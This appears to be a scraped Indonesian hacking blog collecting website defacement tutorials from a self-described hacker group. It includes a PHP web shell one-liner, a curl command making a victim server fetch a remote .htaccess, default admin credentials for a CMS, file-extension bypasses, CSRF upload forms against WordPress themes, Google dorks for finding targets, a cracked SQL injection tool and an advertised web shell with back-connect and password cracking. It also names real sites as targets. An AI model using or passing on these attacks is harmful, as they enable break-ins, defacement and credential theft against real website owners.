Maxteroit: Deface

You want to deface a website but do not have any language programming skills?
Don't worry. You can deface website easily using termux with BadMod tool Detect Website CMS, Website Scanner & Auto Exploiter.

BadMod Detect Website CMS, Website Scanner & Auto Exploiter


Features

  • Vulnerabilties Scanner
  • Dorking
  • Cms Detector
  • Auto Exploit :
    1. Wordpress
    2. Joomla
    3. Drupal
    4. Cms made simple

Installation

$ pkg update && update
$ pkg install git php curl nano
$ git clone https://github.com/MrSqar-Ye/BadMod
$ cd BadMod
$ nano BadMod.php

Delete this code, see the image


to be, see the image


And save, press ctrl+x and type Y, hit the enter
Run the tools using command :
$ php BadMod.php

Choose the number whatever you want
If you want to dorking use this command :


$ php Dorker.php

How To Hack Website Easily With BadMod Auto Exploit Tool

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 2




Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 2 akhirnya saya post :D dan yang pasti masih berhubungan dengan judul yang saya cantumkan diatas yha :D.

Link Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 2 :


https://www.maxteroit.com/2018/07/kumpulan-ebook-hacking-programming-networking-blogging-security.html

Seperti biasa, pemanis....

(Google Haking For Penetration Testing - 529 Pages)



(Metasploit Penetration Testing Cookbook - 269 Pages)



Oke berikut list Ebook Koleksi babang Maxteroit Part 2 :


2.Ebook Google Secrets - How To Get A Top 10 Ranking - 112 Pages

3.Ebook Gray Hat Hacking - 721 Pages

4.Ebook Metasploit The Penetration Testers Guide - 332 Pages

5.Ebook Nmap 6_ Network Exploration and Security Auditing Cookbook - 318 Pages

6.Ebook Nmap Essentials - 118 Pages

7.Ebook nmap-cookbook-the-fat-free-guide-to-network-scanning - 198 Pages

8.Ebook Penetration Testing with the Bash shell - 151 Pages

9.Ebook PHP for Absolute Beginners, 2nd Edition - 236 Pages

10.Ebook Practical Malware Analysis - 802 Pages

11.Ebook Practical Reverse Engineering - 383 Pages

12.Ebook The Art of Memory Forensics - 914 Pages

13.Ebook Windows Sysinternals Administrators Reference - 497 Pages

14.Ebook windows-command-line-administration - 578 Pages

Nah Mungkin baru segitu dulu saja koleksi Ebook saya yang bisa share dipost ini..
Dan di post selanjutnya, saya akan share Ebook mengenai Ethical Hacking
Jangan sungkan untuk bertanya atau meminta sesuatu pada saya :D , sobat bisa hubungi saya ke email === > [email protected]
Terima Kasih  

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security 2

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 1



Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 1 - Ebook mengenai Hacking, Programming, Networking & Security sudah bertebaran di Internet, yap seperti di Blog Ini :D Maxteroit tercinta. Berhubungan banyak yang request mengenai Upload Ebook-ebook yang saya punya :'D  (permintaan dari teman FB) , dengan begitu saya dengan senang hati share koleksi-koleksi ebook yang saya punya, berikut screenshotnya :

(GrayHat Hacking-721 pages)


(Practical Reverse Engineering-383 pages)


Nah itu baru secuil aj :D, 
Berikut Nama sekaligus Linknya :














Itulah Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 1 ,
Penasaran dengan 2 Sampel diatas bukan ? 
tunggu di update-an selanjutnya yha, jgn lupa subscribe, atau jika ingin minta langsung, bisa hubungi saya via email =====> [email protected]

Untuk Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security 1, segitu dulu yha :'p
thx

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security 1


Akses Shell, Bukan Download! - Shell Backdoor dalam computer security system ,merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya).

Salah satu cara mananamkan shell backdoor pada server adalah dengan metode  JQuery File Upload, tapi pernahkah kalian melakukan cara ini namun saat meng-akses shell, shell backdoor kalian malah ter-download? Oke, kita bahas solusinya.


  • .htaccess
Salah satu penyebab shell malah ter-download adalah htaccess. Apa itu htaccess? .htaccess adalah file untuk merubah beberapa konfigurasi untuk mengarahkan pada web server Apache.

AddType application/octet-stream .php

Lalu bagaimana solusinya? Solusinya adalah me-replace htaccess server dengan htaccess kita sendiri.

Bagaimana caranya??

  • 1. Siapkan file .php berisi script berikut,
<?php passthru($_POST['cmd']); __halt_compiler(); ?>
  • 2. Upload ke server korban.
  • 3. Buka termninal, ketikkan perintah,
curl -d cmd="wget https://pastebin.com/raw/ttPzvDjQ -O .htaccess" urlshell
contoh:
curl -d cmd="wget https://pastebin.com/raw/ttPzvDjQ -O .htaccess" http://maxteroit.com/shell.php


  • 4. Upload shell dengan format .berandal > contoh: shell.berandal
Contoh hasil upload:  
https://www.hicinko.com/cruisecms/public/uploadcontent/server/php/files//kecil.berandal

Penutup,
Semua artikel yang dimuat Maxteroit, hanya untuk pembelajaran saja, penggunaan untuk melanggar hukum diluar tanggung jawab Maxteroit. Jika ada kurang jelas atau ada yang ditanyakan, tinggal kan di kolom komentar.

Terima Kasih,
Berandal. 

Akses Shell, Bukan Download!

    Cara Mencari Akses Shell Di CMS Open Journal System

        Mungkin banyak yg coba deface methode Open Journal System ini karna caranya lumayan cukup gampang , tapi banyak orang yg bermasalah pada saat mencari akses Sell / Script yg telah di upload.ya kali ini gw akan bahas tentang Cara Mencari Akses Shell Di CMS Open Journal System.

Yg pasti kalian udah tau atau mengerti cara deface Open Journa System bagi yg belum coba baca atau tanya ke mbah google , langsung aja ikutin step by step nya.

1.Setelah kalian pilih-pilih target , kalian jangan langsung register + tanam shell , Kalian periksa dahulu apakah direktori tempat shell kalian nanti ada atau kagak..

2.Cara cek nya simple, cukup tambahkan /files di belakang url target kalian contoh : http://target.co.li/files



                                                  (NOT VULN / TIDAK BISA DI TUSBOLD :V)
Kalau sering dapet yg kagak vuln mungkin itu evek ketampanan (faktor face) cuba ganti muka atau download yg baru...mungkin dg otak vokepers mu itu bisa mencari cara untuk mencari akses file nya.



                                                              (BISA VULN BISA TIDAK)

     Nah kalau yg kayak gini bisa vuln , bisa tidak .



                                                      (ITS VULN /DI TUSBOLD ENAK :V)


Yg kayak gini vuln , jngan lupa pastikan ada direktori Journalsnya biar di langkah selanjutnya gk bingung :v ok kita lanjutkan coly nya....

3.kalo udah vuln kayak gambar yg no 3 (kurang lebih , karna terkdang ada tampilan yg berbeda)

4.Setelah tanam shell berhasill, kalian balik lagi ke direktori files, kaya contoh di atas (gambar no.3), lalu kalian klik direktori journals -> (keluar angka-angka) pas di bagian di situ mungkin ada direktori angka yang lebih dari 1 -> ke direktori articles -> direktori id user kalian (angka, baca di tutrial deface ojs) -> lanjut ke direktori submission -> lanjut lagi ke direktori original -> nama file kalian.


Udah paham cok??kalau belum makanya jangan kebanyakan nonton vidio anu .....
sekian dulu totor gk guna kali ini , kalau masih bingung atau yg belum mengerti tutorial di atas bisa tanya-tanya ke https://web.facebook.com/MR.H3LL.NET (awas orang ganteng  hati2 naksir) atau bisa juga ke SONO.

Spesial thanks to :"Kurniawan PS , Rival " "Garuda Security Hacker And Hacker Patah Hati Team .

Sekian salam jomblo.

Cara Mencari Akses Shell Di CMS Open Journal System

lets say hello heters !!!
      Mlm semua,,udah lama hibernasi akhirnya bisa share seputar ilmu gaib di sini ea...maaf yak admin di sini jarang post di karnakan ada yg lagi patah hati,,jadi homo,,mulung dll.
   
     Ok langsung aja kali ini aink share cara Menemukan File Backdoor di suatu web,yah caranya mungkin udah basi tapi masih banyak admin web yg rada" geblek :v kagak tau wkwkw ya siapa tau tutor kali ini bisa membantu admin web menjadi admin yg gesit :v


Ikutin Langkahnya Tod !

  • Download dulu backdoor scanner di SINI (Pasword RAR {adithomo123}
  • Extract file rar nya terus upload file BackdoorScanner.php ke web yg ingin di scan lalu panngil file yg di upload tadi misalnya http://nekopoi.co.li/upload/backdoorscanner.php


                                               Kurang lebih seperti itulah penampakannya....

  • beri centang di semua kecuali yg terakhir




                                                         Penampakan Keduanya Gan


  • Dan Terakhir Klik START SCAN
                                                           Sekarang coba kita lihat hasilnya



Coba Lihat yg berwarna hijau..ada 4 Shell Backdoor :v Sadeees....sekarang coba kita lihat sheel yg telah terdeteksi.....
Ada Yg Upload Sheel Indo Exploit :v tinggal hapus dah file yg terdeteksi tadi done :v lanjut nge JAV


     Oke sekian tutor sampah kali ini moga" bisa berguna buat admin supaya menjadi admin yg gesit ..cepat tanggap :v

Kalo ada yg kurang jelas atau mau tanya" silahkan tanya di https://web.facebook.com/MR.H3LL.NET Dan Jangan Lupa Like Fanspage Kami Di                                                                                        SONO













Cara Menemukan File Backdoor Di Suatu WEB

Gambar Hanya Pemanis.

Cara Mencari Halaman Login Admin

Sore gaes, lama juga gw ga nongol, hehe. Jadi pengen peluk kalian semua satu - satu, Unchh.
Kali ini gw balik dengan Tutorial Cara Mencari Halaman Login Admin.

Pernah gak kalian, abis maen SQLi misalnya, user/pass udah dapet, password udah berhasil di decrypt, tapi ganemu Halaman Login Admin? Sering. Nah, disini gw bawain beberapa cara nemuin halaman terkutuk itu :P

1. Havij.
Ya, Havij. Havij ini salah satu alat yang membantu penguji penetrasi untuk mencari dan mengeksploitasi kelemahan SQL Injection pada halaman web. Dan disana ada fitur admin finder nya loh.

Tutorial SQLi dengan Havij


2.  Admin Finder.
Di dunia ini, coba gw tanya, ada berapa tool adminfinder? Banyak :P Kalian bisa gunain salah satu dari mereka. Misal, dari sini. 

3. View Source.
Lahh? Kok View Source? 
Mungkin beberapa dari kalian belum tau ya :P Jadi kita intip2 source code web tadi.  
Lihat contoh ini,


 Disitu bisa kita lihat, sebelum dir uploaded_files , ada dir lagi dengan nama dashboard, kalian tau kan artinya? Wkwk.

4 . Intip Sampai ke Developernya.
Iya, cara ini emang gak umum banget, juga ini ada unsur - unsur factor face biasanya, wkwk.
Kebanyakan web, di bagian footer bakal ada nama developer dari web tadi. Nah, kita intip kesana, yuk gw tunjukin.
1. Target : http://mer99furniture.com/
2. Lihat ke pojok kanan bawah. Disitu tertulis Development by Mobista Technologies.
3. Dari web Mobista Technologies, kita intip - intip lagi. Dan gw nemu, di sini.
4. Kebetulan disana kita bisa lihat demo back-end dari web-web hasil karya Mobista Technologies. Dan salah satunya di sini.
5.Tinggal kita sama kan dengan target pertama, dan .. Gotcha! I got you! Halaman admin target berada di site/ew-admin. Persis seperti demo di web Mobista Technologies.

Mungkin cara terakhir agak rumit karena emang kita masuk banget sampe intip - intip ke web developer nya, hehe. But, Trust Me, it works.

Sekian postingan gw kali ini. Sampe Ketemu di postingan gw selanjutanya.

Cara Mencari Halaman Login Admin

Hello Beb , Kuy ,Gan ,Om  , Tante Sekalian Udh Lama Gk Posting Di Karnakan Sibuk Di Dunyat (Dunia Nyata). Ini Artikel Saya Yg Kedua,,Jaran Post Yahh :'v Ya Iyalah Ente kira gampang buat nyari bahan buat di post,di tambah lagi urusan tentang ceuek , Hey Kamu Apa Kabar #Nf wkwkwk Jadi Curhat :v Halah Gk Ush Ngebacot Lagi Langsung Aja Masuk Ke Tutorial Kali Ini Cara Menemukan Celah Website Dg SQL Poizon.

Setelah kita mengetahui cara melakukan sqlinjection dengan havij, kali ini saya mau bahas tool yang gak kalah keren nih. Namanya adalah SQL Poizon, jadi fungsi dari tool ini adalah untuk menemukan celah dalam websiste dengan dork yang udah tersedia di dalam tool ini.Jadi pekerjaan kita mencari target bakal lebih cepat dengan menggunakansql poizon.  Untuk lebih jelasnya simak tutorial dibawah ini .

Step 1: Download SQL Poizon Software
Step 2: Buka Sql Poizon v1.1 – The Exploit Scanner.exe

Step 3: Seperti terlihat dalam gambar, di dalam tool ini sudah terdapat beberapa dork. Dalam contoh ini kita gunakan dork PHP , yaitu index.php?id=. Setelah memilih dork, kita klik scan untuk melihat hasil dari dork php tadi.


Step 4: Setelah kita menemukan target, kita bisa gunakan Sqli Crawler. Caranya kita tinggal klik kanan pada target kita pilih “Send to Sqli Crawler -> All”





Step 5: Pada tab Sqli Cralwer tab, kita tinggal klik Crawl untuk memastikan manakah website yang bisa kita hack dengan sql injection.



Step 6: Setelah ketemu target yang vuln, kita bisa klik export result untuk menyimpan daftar url yang vuln 




Nah kalo udah ketemu web yang vuln kan kita bisa langsung eksekusi, bisa kita hack lakukan SQL Injection secara manual atau bisa juga kita gunakan toolhavij untuk SQLi

Oke deh sekian dulu tutorial
kalau masih ada yg kurang jelas atau mau belajar seputar hacking  PM saja fb saya 
Di Sini

btw makasih buat Habil Zeus Udh Ngizinin Post Postingan yg sama hehehe.

Cara Menemukan Cela Website Dengan SQL Poizon

Tutorial Deface bk27cms bypass administrator


Hell come back to maxteroit boy, sorry baru update lagi, dan kali ini saya akan membahas tentang Tutorial Deface bk27cms bypass administrator, dan tutorial ini saya dapatkan dari teman se-team saya yg bernickname k4luga, alias mas adhi :* , oke langsung saja kita bahas tutorialnya.

Dork sementara :
intext:Powered by BK27CMS

selebihnya kembangin sendiri yha :)

Pertama, kita dorking dulu menggunakan dork diatas :


setelah itu, kita pilih salah satu calon korbannya, jika sudah memilih, tambahkan /bk27panel setelah domain utama, misal >>> target.com/bk27panel

Kedua, Setelah masuk ke web loginnya, masukkan :
username : webmaster

dan password : 303305


Ketiga, setelah berhasil login, masuk ke tab Komponen


Keempat, tugas kita disini yaitu uploading shell, untuk itu, pilihlah menu Files Upload seperti gambar berikut


Kelima, nanti disana tersedia uploader files, nah disini sebaiknya kita bypass ekstensi shellnya dengan ekstensi .php.pjpeg >>> shell.php.pjpeg, lalu klik browse, trus carilah shell kalian untuk diupload.


Keenam, jika sudah terupload, akan tercantum nama file yg sudah kita upload tadi, lalu klik kanan lah mouse kalian lalu copy link location shell kalian, seperti berikut



Jika shell sudah terakses, terserah kalian mau kalian apaain :v , kami tidak bertanggung jawab :v,
sekianlah tutorial sederhana dari maxteroit, jika ada yg tidak jelas, silahkan tanyakan di komentar,
terima kasih

thx to :
k4luga a.k.a mas adhi (Owl Squad)

Tutorial Deface bk27cms bypass administrator


Malem mblo :p
Lama gak update yaa :3

Kali ini gw mau share Tutorial SQL Injection Using Havij. 
Simak yaa :*

Bahan :
1. Dork
Sedot
2. Havij 1.17 Full Crack
Download 

Langkah - langkah :
1. Dorking ke google.

2. Tambahin string (') di belakang url target. Kalo error berarti vuln.

3. Masukin ke Havij.

4. Klik Analyze.

5. Klik 'Get Tables'.

6. Kita cari coloumn yg isinya mungkin ada username+password atau data buat login.

7. Kalo udah cari, klik 'Get Coloumn'.

8. Nahh, abis itu kita cari data nya. Username, password, email dll.

9. Klik 'Get Data'.

Taraaa, keluar deh username + passwordnya. :)

Kalo masih belum jelas, bisa liat video dibawah ini.


Okee, sekian tutorial gw kali ini, kalo masih bingung, bisa komen di bawah ^.^
Sampe ketemu di post berikutnya :*
.
Regards,

Tutorial SQL Injection [HAVIJ]

Malem fans :p
Lama yak gaketemu :v

Kali ini gw mau share Tutorial Deface Wordpress Plugin WP-DreamWork Gallery
Lansung ajaaa

Bahan: 
1. Dork : Kembangin lagi pake otak vokepers kalian :p
inurl:/wp-content/plugins/wp-dreamworkgallery/
2. CSRF :
Klik disini

Langkah - langkah :
1. Dorking ke gugel :v

2. Pilih salah satu site.

3. Masukin target lu ke CSRF nya.

4. Buka CSRF nya.

5. Pilih file/shell yg mau lu upload.

6. Kalo sukses bakal ada nama file kalian beserta file akses nya :)

7. Tinggal buka aja deh :)

Kalo masih belum jelas, bisa liat video dibawah :)


Okee, sekian tutorial gw kali ini. Kalo masih ada yg belum ngerti, ada kolom komentar di bawah :)
.
Regards,
Berandal. [OWL SQUAD]

Deface Wordpress Plugin WP-DreamWorkGallery

 Deface Wordpress Themes Multimedia1

 

Hello sobat maxteroit, kali ini saya (Berandal) akan share my new POC about deface wordpress, metodenya yaitu Wordpress themes multimedia1 shell upload vulnerability.
Berikut dokumentasi yg telah saya upload ke web tempat upload poc hacking :

   
Wordpress Themes Multimedia1 Shell Upload Vulnerability | CSRF
Author : Berandal
Google Dork: inurl:/wp-content/themes/multimedia1/
Tested on: Win 7, Linux
Blog : http://www.maxteroit.com/

+-+-+-+-+-+-+-+-+
|B|e|r|a|n|d|a|l|
+-+-+-+-+-+-+-+-+

[!] Exploit : http://127.0.0.1/wp-content/themes/multimedia1/server/php/

[!] File Location : http://127.0.0.1/wp-content/themes/multimedia1/server/php/files/shell.php
[*] CSRF:
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/multimedia1/server/php/" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>


[*] ABOUT:

Facebook: https://www.facebook.com/owlsquad.id
Twitter: https://www.twitter.com/id_berandal
Greetz : All Official Member OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer.

Deface Wordpress Themes Multimedia1



Deface CMS Balitbang Versi 3.5.5 dengan CSRF Online



Assalamu'alaikum Wr. Wb.

yep, kali ini w bakal share metode Deface CMS Balitbang Versi 3.5.5 , metode ini adalah lanjutan dari metode CMS Balitbang 3.5.3 yang banyak di share di blog blog lain.
oke, langsung aja gausah kelamaan :'v Time is Mirror :v

Baca juga : 

Dork : "intext:Tim Balitbang versi 3.5.5"
kembangin pake imajinasi artis - artis JAV kayak Tsubasa Ozora misalnya :'v



Langkah - Langkahnya :
1. Dorking gugel, atau dimana aja terserah se enak lu :v



2. Buka CSRF tadi, isi kolom kolom terserah





3. Jika sudah klik next, Maka akan muncul kolom baru


4. Isi captcha nya, lalu klik go, nanti akan muncul di kolom target




5. Jika sudah klik kolom klik disini, Maka akan muncul validasi membernya, lalu klik kolom lewat sini brade!!


6. Klik kolom klik disini untuk bikin session, jika yes, kita coba upload shell dengan ekstensi phtml



7. akses shell target.sch.id/files/tugas/tgs-ganteng.phtml


Note :
* karena metode ini menyangkun web indo jangan tebas index yak :*

untuk lebih jelasnya bisa lihat videonya di bawah ini :D





Credit and Thanks to :
TKJ Cyber Art (base CSRF Online)
Owl Squad
Blck0wl?
Berandal
Rizky21ID
Z3U54774CK
Artefvcker
and all member Owl Squad


Best Regards,
Zetya

Deface CMS Balitbang Versi 3.5.5 dengan CSRF Online

Tampilan Halaman Login

Haii, Kali ini gw mau share Shell buatan gw sendiri :) Shell ini gw recode dari IndoXploit Shell First Edition.
Thanks buat IndoXploit Coders Team. :)
Semua fitur dalam shell ini dibuat auto tinggal Klik-Klik sajaa.
Tampilan Shell

[RELEASE] Berandal Shell First Edition V.1

Fitur Berandal Shell:

  • K-RDP Shell
  • Fitur untuk membuat Akun RDP yang dapat digunakan hanya di Windows server.
  • Back Connect
  • CPanel/FTP Auto Deface
  • Memakai alur ftp_connect, hanya memanfaatkan kesamaan password cpanel & ftp saja. tidak semuanya bisa hanya web yang ftp nya sama dengan user/pass cpanel nya yang bisa otomatis di deface.
  • Config Grabb
    • Popoji CMS
    • Voodoo CMS
    • Wordpress
    • Joomla
    • Drupal
    • Magento
    • Ellislab Devteam [CI]
    • Opencart
    • Prestashop
    • phpBB
    • Lokomedia
    • Sitelook
    • Bosweb
    • WHMCS
    • Cpanel


Jumping [error fixed] :
Jumping hpshere & Jumping /var/vhosts [ updated ]
Kelebihannyaa bisa langsung ambil nama domainnyaa :
Cpanel Crack [blank user/pass fixed]:
Fitur ini udah otomatis Grab Passwordnyaa dan juga otomatis mengambil info domain nya, ikutin saja petunjuknya .
SMTP Grabber :
Hanya mengambil info smtp joomla yg ada di config.
Auto edit user / MPC :
Udah otomatis edit seluruh user admin dari config *ga semuanya , cuma beberapa cms aja
Disetiap tools tertentu ada "NB" ikutin petunjuknya sajaa.

Dan fitur tambahan :

  1. Server Info.
  2. PHP Info.
  3. Who Is Lookup.
  4. Safe Mode.
  5. Shell Finder.
  6. FTP Brute Force.
  7. Bypass etc/passw.
  8. CMS Lokomedia Exploiter.
  9. CMS Balitbang Exploiter.
  10. Port Scan.
  11. Zip Menu, [Upload and Unzip, ZIP Backup, Unzip Manual].
  12. Shell Checker.
  13. Hash ID.
  14. String Encoder.
  15. Network [Bind Port, Back Connect, Metasploit Connection].
========================================================================
========================================================================
Selamat Menikmati :)

Spesial Thanks:
.

Regards,
Berandal, [OWL SQUAD]

[RELEASE] Berandal Shell First Edition V.1



Haii fans :P
Kali ini gw mau share Tutorial Deface Wordpress Theme Theagency. :)

Bahan:
1. Dork.
inurl:/wp-content/themes/theagency
2. Exploit.
/wp-content/themes/theagency/includes/uploadify/uploadify.php

3. CSRF.
 Ambil disini.

Langkah - Langkah:

1. Dorking ke google.

2. Pilih salah satu site.

3. Masukin exploitnya.

4. Vuln = Blank.

5. Masukin site ke CSRF.

6. Pilih file/shell/ yg mau lu upload.

7. Kalo file sukses ke upload, bakal muncul angka '1'.

Akses file? 
/wp-content/themes/theagency/includes/uploadify/uploads/namafile 
contoh:
http://google.com/wp-content/themes/theagency/includes/uploadify/uploads/namafile

Kalo masih kurang jelas, simak video tutorial gw :

 

Okee, sekian tutorial gw kali ini, semoga bermanfaat :)

Regards, 

Deface Wordpress Theme Theagency






Pagii heker :p . Sekarang gw mau sare deface Metode Themes WordPress Themes RightNow,
mumpung lagi di net :), langsung saja siapain bahan bahannya :


BAHAN:
1. Dork: 

  • inurl:/wp-content/themes/RightNow/ 
  • inurl:/wp-content/themes/RightNow/includes/
  • Index Of intext:themes/rightnow/
  • Selebihnya gunain otak Bokeper :V


2. Exploit:
/wp-content/themes/RightNow/includes/uploadify/upload_background_image.php
contoh:
gugel.com/wp-content/themes/RightNow/includes/uploadify/upload_background_image.php


3.  CSRF. Ambil disini.


LANGKAH - LANGKAH:

1. Dorking ke google. Klik disini.

2. Pilih salah satu site.

3. Masukkan exploit nya.

4. Kalo vuln akan blank.

5. Masukkan ke CSRF.

6. Kalo file sukses ke upload bakal ada angka '1' .

7. Akses file?
site.com/wp-content/uploads/galleryimages/


Kalo masih belum jelas, simak video gw dibawah :D




Okee, sekian tutorial gw kali ini :) See ya next time :*
Kalo pengen belajar bareng, bisa gabung grup Facebook OWL SQUAD :) Klik.
Bisa juga follow twitter gw :v Twitter.


Regards,

Deface Wordpress Themes RightNow

Subscribe Our Newsletter